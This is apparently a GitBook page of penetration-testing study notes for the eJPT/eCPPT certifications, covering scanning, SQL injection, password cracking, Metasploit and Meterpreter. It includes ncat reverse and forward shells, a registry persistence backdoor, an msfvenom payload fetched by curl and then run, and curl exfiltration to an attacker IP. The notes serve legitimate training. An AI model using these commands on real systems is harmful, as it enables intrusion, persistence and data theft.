> For the complete documentation index, see [llms.txt](https://www.battlecoder.com/battlecoder/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.battlecoder.com/battlecoder/notes/ejpt-ecppt-notes.md). # eJPT/eCPPT Notes ### Methodology #### Testing Checklist * Refer to the OWASP Testing Checklist: [Testing Checklist](https://wiki.owasp.org/index.php/Testing_Checklist) ### Routing #### Check Routes * Command: `route` #### Add Route * Command: `ip route add / via dev ` ### Start Python Server * Recommended to change into `/tmp` directory * Command: `python -m SimpleHTTPServer 8080` * Put things in the same directory to access them via a webpage ### Web #### Netcat * Start a connection: `nc -v hack.me 80` * Make GET request: ```plaintext GET / HTTP/1.1 Host: hack.me ``` * Only works for HTTP #### For HTTPS use OpenSSL * Command: `openssl s_client -connect hack.me:443` * Use `-debug`, `-state` for more info * Use `-quiet` to remove connection info ### Information Gathering #### Open Source * **Crunchbase**: IT startup database, information about founders, investors, employees, buyouts, acquisitions * **Whois Database**: Owner name, address, email, technical contacts #### Subdomain Enumeration **Passive Enumeration** * Google query: `"site:company.com"` * Tools: * [dnsdumpster.com](https://dnsdumpster.com) * [virustotal.com](https://virustotal.com): Search cached DNS subdomains * [crt.sh](https://crt.sh): Collect SSL certificates and valid domain names * Inspecting certificates on domains may lead to more subdomains **Tools for Subdomain Enumeration** * **sublist3r**: * Command: `sublist3r -d google.com` * Has brute force option that parses provided wordlist * **amass**: * Install: ```plaintext apt install snapd service start snapd snap install amass snap run amass ``` * Example: `snap run amass -ip -d google.com` ### Footprinting & Scanning #### Mapping a Network * **fping** performs a ping sweep on an IP range: * Commands: ```plaintext fping -a -g 10.54.12.0/24 fping -a -g 10.54.12.0 10.54.12.255 fping -a -g 10.54.12.0/24 2>/dev/null ``` * **nmap** can perform ping scans with the `-sn` flag: * Command: ```plaintext nmap -sn 200.200.0.0/16 nmap -sn 200.200.123.1-12 nmap -sn 172.16.12.* nmap -sn 200.200.12-13.* nmap -iL ``` #### OS Fingerprinting * **nmap** can fingerprint OS with `-O` flag, use `-Pn` flag to skip ping: * Command: `nmap -O -Pn ` #### Port Scanning * **TCP Connect Scan**: * SYN -> <- SYN + ACK * ACK -> RST + ACK (closes connection) * **Scanning Closed Port**: * SYN -> <- RST + ACK (port is closed) **nmap Port Scanning** * Common Flags: * `-sT`: TCP connect scan * `-sS`: SYN scan * `-sV`: Version detection * `-Pn`: Skips ping sweep, useful if network has firewalls or blocks ICMP packets #### Spotting Firewall * Incomplete nmap results on well-known services like a web server: * Example: “http?” or “tcpwrapped” means remote host closed connection without receiving data * Use `nmap --reason` to get more information on why a port is open or closed #### masscan * Used for scanning large networks quickly, not as accurate as nmap: * Example: ```plaintext ./masscan -p 80,443,22 -Pn --rate=800 --banners 10.142.111.0/24 -e tap0 --router-ip 10.142.111.1 --echo > masscan.txt ``` ### Vulnerability Assessment #### Nessus * Popular vulnerability scanner, uses a client & server: * Starts with a ping sweep and port scan, then probes each daemon and cross-checks responses with a vulnerability database * Prone to false positives **Installing Nessus** * Command: `dpkg -i nessus.deb` **Usage** * Commands: ```plaintext service nessusd start ``` * Open web interface (may need to add security exception) * Setup custom policy and scan using GUI, export results ### Web Attacks #### Web Server Fingerprinting * **Netcat**: * Command: `nc 80` * After connecting, send a valid HTTP request: ```plaintext HEAD /HTTP/1.1 ``` * Netcat only works on HTTP websites, for HTTPS use OpenSSL: * Command: `openssl s_client -connect target.site:443` * Example: ```plaintext HEAD / HTTP/1.0 ``` **Automated Fingerprinting Tool httprint** * Example: `httprint -P0 -h -s /usr/share/httprint/signatures.txt` * Flags: * `-P0`: Not ping web server * `-h`: Define host * `-s`: Define signature file #### HTTP Verbs * **GET**: Used to request resource ```plaintext GET /page.php HTTP/1.1 HOST: www.example.com ``` * **POST**: Used to submit HTML form data ```plaintext POST /login.php HTTP/1.1 HOST: www.example.com username=John&password=yourmom ``` * **HEAD**: Used to grab header ```plaintext HEAD / HTTP/1.1 HOST: www.example.com ``` * **PUT**: Used to upload file to server ```plaintext PUT /path/to/destination HTTP/1.1 HOST: www.example.com ``` * You must know the size of the file you are trying to upload * Example: ```plaintext wc -m payload.php 20 payload.php PUT /payload.php HTTP/1.1 Content-type: text/html Content-length: 20 ``` * **DELETE**: Used to remove file from server ```plaintext DELETE /path/to/destination HTTP/1.1 HOST: www.example.com ``` * **OPTIONS**: Used to query web server for available HTTP verbs ```plaintext OPTIONS / HTTP/1.1 HOST: www.example.com ``` ### Netcat #### Setup nc Listener or Server * Command: `nc -lvp 8888` * Connect to nc listener: `nc -v 127.0.0.1 8888` * To make connection UDP: Add `-u` * Sending file over nc: * Command: `cat tobesent.txt | nc -v 127.0.0.1 8888` * Reverse Shell: * Command: `nc -lvp 1337 -e /bin/bash` ### Dirbuster / Dirb #### Dirbuster * GUI based directory enumerator #### Dirb * Command line based directory enumerator **Basic Usage** * Commands: ```plaintext apt install dirb dirb http://google.com dirb http://google.com /usr/share/dirb/wordlists/small.txt ``` **Common Flags** * `-a`: Change user agent to make request look like they come from a browser, useragentstring.com * `-c “COOKIE: XYZ”`: Specifies cookie in request * `-u “admin:password”`: User authentication in request * `-H “My Header: My content”`: Add header into request * `-r`: Turn off recursive search “sub directories” * `-z 1000`: Changes speed to one request a second * `-s`: Silent mode: only displays items that were found * `-X “.php,.bak”`: Append extensions to word list * `-x extensions.txt`: Include file with extensions * `-o results.txt`: Saved results in output file **Run dirb through Proxy “Burp”** * Command: `dirb http://google.com -p http://127.0.0.1:8080` ### MySQL #### Login to MySQL Server * Command: ```plaintext mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198 ``` * `-u` for user * `-p` for password (no space) ### Google Dorking * **site**: Only include results from specified host * **intitle**: Filters results based on title of page * **inurl**: Text included in URL * **filetype**: Used to search for specific file extensions .pdf, .xls * **AND, OR, &, |**: Logical operators for queries * **-**: Used to filter out words ### Cross-Site Scripting (XSS) #### Overview * Occurs when web application uses unfiltered user input to build the output content displayed to its end users; this lets an attacker control the HTML and Javascript code, thus attacking the application user. #### User Input * Any parameter coming from client side of web app such as: * Request headers * Cookies * Form inputs * POST parameters * GET parameters #### Payloads * **Alert that XSS is there**: ```html ``` * **Steal cookies**: ```html ``` * **Steal cookies and send them to attacker controlled site**: ```html ``` ### SQL #### Example Query * Command: ```plaintext SELECT name, description FROM products WHERE id=9; ``` #### Web App Use * In order for a web app to use database it must: * Connect to database * Submit query * Retrieve results before applications can use results #### Example SQL Injection * Command: ```plaintext ' OR 'a' ='a ' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a ``` #### Finding Injection Points * Test every supplied user input used by the web app: * GET parameters * POST parameters * HTTP headers: * User-Agent * Cookie * Accept #### Input SQL Injection * String terminators: `'`, `"` * Commands: `SELECT`, `UNION` * SQL Comments: `#`, `--` #### SQL Functions * Commands: ```plaintext show databases; // shows databases use selected_db; // replace selected_db with db show tables; // shows tables in selected db select * from flag; // shows all records in flag update users set adm="yes" where username="tracking1"; // update records in db ``` #### More Commands * `SELECT user();` // displays current database user * `select substring(user(), 1, 1) = 'r';` // returns a true or false (0 or 1), effective for learning more about what db contains #### Union Based Injection * Commands: ```plaintext UNION SELECT user(); -- -; UNION SELECT null, null; -- - // two fields in this example UNION SELECT 'els1', 'els2', 'els3'; -- - ``` ### SQLMap #### Overview * Open source penetration testing tool that automates process of detecting SQL injection * Capable of both detecting and exploiting * Always recommended to test by hand first to avoid crashing DB #### Basic Syntax * Command: ```plaintext sqlmap -u -p [options] ``` #### Examples * Command: ```plaintext sqlmap -u 'http://victim.site/view.php?id=1' -p id --technique=U ``` * Test the id parameter of the GET request for view\.php, tells sqlmap to use UNION based injection * To test POST request: ```plaintext sqlmap -u --data= -p parameter [options] ``` * Command: ```plaintext sqlmap -u http://sql.site/view.php?id=1 sqlmap -u http://sql.site/view.php?id=1 -b sqlmap -u http://sql.site/view.php?id=1 --tables sqlmap -u http://sql.site/view.php?id=1 --current-db selfie4u --columns sqlmap -u http://sql.site/view.php?id=1 --current-db selfie4u --dump ``` #### More SQLMap Syntax * `-v3`: Displays queries used * `--users`: Enumerate users * `--dns`: See what dbs are connected * `-D dbname --tables`: Specify db and enumerate tables * `-T specified table --columns`: Grab columns from specified tables * `-C specify columns, column2 --dump`: Dump records of specified columns * `--data='user=a&pass=a'`: POST injection, grab post info from burp-suite ### Metasploit SQL Enumeration * Use auxiliary/scanner/mssql/mssql\_login ### Backdoors #### Hide ncat in Windows systems32 directory #### Forward Shell * On Windows machine: ```plaintext ncat -l -p 5555 -e cmd.exe ``` * On attacker machine: ```plaintext ncat 192.168.0.25 5555 ``` #### Reverse Shell * On attacker machine: ```plaintext ncat -l -p 5555 -v ``` * On Windows machine: ```plaintext ncat -e cmd.exe 192.168.0.24 5555 ``` #### Persistent Backdoor 1. Start listener on attacker machine 2. Open regedit on Windows machine 3. Navigate to `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` 4. Right-click and add new string value, name ncat, edit string value and add path to ncat binary along with reverse shell syntax: `"C:\Windows\System32\ncat.exe -e cmd.exe"` 5. Restart victim machine to activate shell ### Password Attacks #### JohnTheRipper * After acquiring `/etc/passwd` (hashed passwords on Linux system) & `/etc/shadow` (users on Linux system), John needs user and pass to be in the same file: * Command: ```plaintext unshadow passwd shadow > crackme ``` * Brute Force: ```plaintext john --incremental --user: ``` * To display passwords recovered by John: ```plaintext john --show crackme ``` * Cracked passwords stored in file **Dictionary Attack** * Command: ```plaintext john --wordlist=custom_wordlist --rules ``` * Good wordlist to install: ```plaintext apt-get install seclists ``` #### Rainbow Tables * Tables containing passwords that have been pre-hashed saving time and computational power. * **Ophcrack**: Rainbow table password cracking tool ### Authentication Cracking #### Hydra * Tools used for cracking network services such as HTTP, SSH, FTP, etc. * Syntax:

hydra -L users.txt -P pass.txt <service://server> <options>

**Configuring Hydra** 1. Inspect page source 2. Figure out how credentials are being sent to server (POST) 3. Figure out names of parameters being sent (pwd, usr) * Example Webpage:

hydra crackme.site http-post-form "/login.php:usr=^USR^&pwd=^PASS^:invalid credentials" -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou.txt -f -V

* `-L`: List of user names * `-P`: List of passwords * `-f`: Hydra will stop after first credential found * `-V`: Verbosity * Example SSH:

hydra 192.168.102.143 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V

### Windows Shares #### UNC or Universal Naming Convention Paths * `\\servername\ShareName\file.net` #### Administrative Shares * `\\ComputerName\C$`: Lets admin access volume on local machine * `\\ComputerName\admin$`: Points to the Windows installation directory * `\\ComputerName\ipc$`: Used for interprocess communication #### Nul Sessions * An anonymous connection to an inter-process communication network service on Windows-based computers: 1. Check and see if the target has any file server enabled 2. `nbstat -A 10.123.162.2` or `nbstat \?` for help 3. The third line down will tell you if the target is sharing any files in the <> field 4. If file server is enabled, enumerate shares with `NET VIEW` 5. `NET VIEW ` 6. Try to connect to share 7. `NET USE \\\IPC$ '' /u:''` (connect to the IPC$ share without authentication) * **enum**: * Script that automates enumeration of shares * Commands: ```plaintext enum -S // enumerates shares enum -U // enumerates users enum -P // enumerates password policies ``` * **winfo**: * Another enumeration tool * Command: ```plaintext winfo -n // -n for null session ``` #### Linux Version 1. `nmblookup -A ` 2. `smbclient -L \\: -N` * Use instead: `smbclient -L -I -N -U ""` (allows you to see services on target, `-N` forces no password) 3. `smbclient ///IPC$ -N` * Use instead: `smbclient \\\\\\ -N` (connects to IPC share without authentication) #### Enumeration Scripts * **enum4linux script**: * Enumerates shares * Brute force enumeration:

enum4linux -s /usr/share/enum4linux/share-list.txt <target_ip>

* **samrdump.py**: * Enumerates info about users using null sessions * Command:

/usr/share/doc/python-impacket-doc/examples# python samrdump.py <target_ip>

* **nmap smb enumeration**: * Commands:

nmap --script=smb-enum-shares <target_ip>  // enumerates shares
    nmap --script=smb-enum-users <target_ip>  // enumerates users
    nmap --script=smb-brute <target_ip>  // brute force authentication

### ARP Poisoning * Works by changing the ARP caches on two network nodes. Attacker sends unsolicited ARP packets to the two nodes telling them to route traffic through the attacker computer. #### Enable Packet Forwarding * Command: ```plaintext echo 1 > proc/sys/net/ipv4/ip_forward ``` #### Dsniff * Tool used for ARP poisoning: * Example: ```plaintext arpspoof -i -t -r ``` * `-i`: NIC * `-t` & `-r`: Victims * You can then run Wireshark to see the traffic ### Metasploit #### Framework for Exploiting Machines **Requirements Before Use** * Commands: ```plaintext service postgresql start service metasploit start ``` #### Start * Command: `msfconsole` #### Help * Command: `show -h` #### Search * Command: `search ` #### Show All Exploits * Command: `show exploits` #### Use Exploit * Command: `use exploit/windows/ftp/turboftp_port` #### Go "Back" * Command: `back` #### Get Info About Exploit * Command: `info` #### See Exploit Options * Command: `options` #### Configure Exploit Parameters * Command: `set` #### See Available Payloads * Command: `show payloads` #### Set Payload * Command: ```plaintext set payload windows/meterpreter/reverse_tcp ``` #### Launch Exploit/Payload * Command: `exploit` #### Create Listener * Commands: ```plaintext use exploit/multi/handler set payload php/reverse_php set payload php/meterpreter_reverse_php set payload php/meterpreter_reverse_tcp ``` #### Upgrade to Meterpreter * Commands: ```plaintext background current session use post/multi/manage/shell_to_meterpreter ``` #### Scan for SMB Vulnerabilities with nmap * Command:

nmap --script smb-check-vulns.nse --script-args=unsafe=1 <target_ip>

### Meterpreter #### Advanced Shell **Search for Meterpreter Payloads** * Command: `search meterpreter` **Put Session in Background** * Command: `background` **List Current Sessions** * Command: `sessions -l` **Resume Session** * Command: `sessions -i 1` **Get Info About Machine** * Command: `sysinfo` **Network Info** * Command: `ifconfig` **Routing Tables** * Command: `route` **Get Current User ID** * Command: `getuid` **Elevate Privilege** * Command: `getsystem` * If operation fails, try the following: 1. Background session 2. Search bypassuac 3. Use exploit /windows/local/bypassuac 4. Set session 5. Exploit **Uploading/Downloading Files** * Command: `upload ` or `download ` **Use Standard OS Shell** * Command: `shell` **See All Processes Running** * Command: `ps` **See Process Meterpreter is Attached to** * Command: `getpid` **Check UAC** * Command: `run post/windows/gather/win_privs` **Migrating Process to be Stealthy** * When migrating process, the new process must have the same level of privilege: * Command: `ps -U SYSTEM` * This command will search for all other processes with system-level privilege: * Command: `migrate ` ### Remote Code Execution (RCE) #### Blind RCE * Test bash sleep command to see if page is delayed: * Command: `sleep 5` #### Testing Network Connectivity * Use Wireshark to pick up ICMP packets: * Command: `ping -c 5` * May need to use URL encoding to keep syntax intact #### Testing Webshell **Get Paths to Installed Programs** * Command: `echo $PATH` **Look for Specific Tools** * Command: `which ` #### Curl **See if You Can Establish TCP Connection** * On Attacker: * Setup listener with nc: `nc -lvp 53` * On Target: * Establish TCP with curl: `curl http://:` **Test Commands with Curl** * Commands: ```plaintext curl http://:/'whoami' ``` **Test Commands with Spaces in the Output with Curl** * Commands: ```plaintext curl http://:/'id' ``` * Command above will not display properly because there are spaces in the output, need to encode to see full output: * Command: ```plaintext curl http://:/'id|base64' ``` * To decode: * Command: ```plaintext echo "fsdaflasdfsjdf" | base64 -d ``` **Downloading Files with Curl** * Command:

curl http://<attacker_ip>:<attacker_port>/file -T /etc/issue

**Uploading Files** 1. Start simple Python HTTP server: * Command: ```plaintext python -m SimpleHTTPServer 9090 ``` * All files in directory you start Python server in will be available via server 2. Generate payload & store it in server directory: * Command:

msfvenom -p linux/x64/shell_reverse_tcp lhost=<attacker_ip> lport=<port_on_listener> -f elf -o reverse53

3. Get payload on victim machine: * Command:

curl http://<attacker_server>:<server_port>/reverse53 -o /tmp/r
  chmod +x /tmp/r

4. Test if file was uploaded by downloading it: * Command: ```plaintext curl http://:/ -T /tmp/r ``` 5. Running payload: * Command: ```plaintext start nc listener /tmp/r ``` 6. Spawning a Better Shell: * Command: ```plaintext bash -i ``` * Spawns bash environment * There are lots of shells you can easily spawn, look them up “spawning tty shell”: * Command: ```plaintext python -c 'import pty; pty.spawn("/bin/bash")'; ``` #### Pivoting with Meterpreter * Command: ```plaintext background current session and then: run autoroute -s 172.16.50.0/24 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.battlecoder.com/battlecoder/notes/ejpt-ecppt-notes.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.